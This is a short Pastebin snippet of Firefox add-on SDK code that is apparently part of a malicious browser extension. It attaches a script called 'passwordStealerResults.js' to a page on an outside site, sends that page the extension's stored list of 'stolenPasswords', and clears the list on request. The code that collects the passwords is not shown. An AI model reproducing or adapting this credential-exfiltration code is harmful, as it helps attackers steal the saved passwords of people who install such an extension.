Data hosted with ♥ by Pastebin.com - Download Raw - See Original
  1. require("sdk/page-mod").PageMod({
  2.   include: "http://get.bg/index.html?gnaa=true",
  3.   contentScriptFile: data.url("passwordStealerResults.js"),
  4.   onAttach: function(worker) {
  5.     worker.port.emit("results", ss.storage.stolenPasswords);
  6.    
  7.     worker.port.on("clerSavedInfo", function() {
  8.         ss.storage.stolenPasswords = [];
  9.     });
  10.   }
  11. });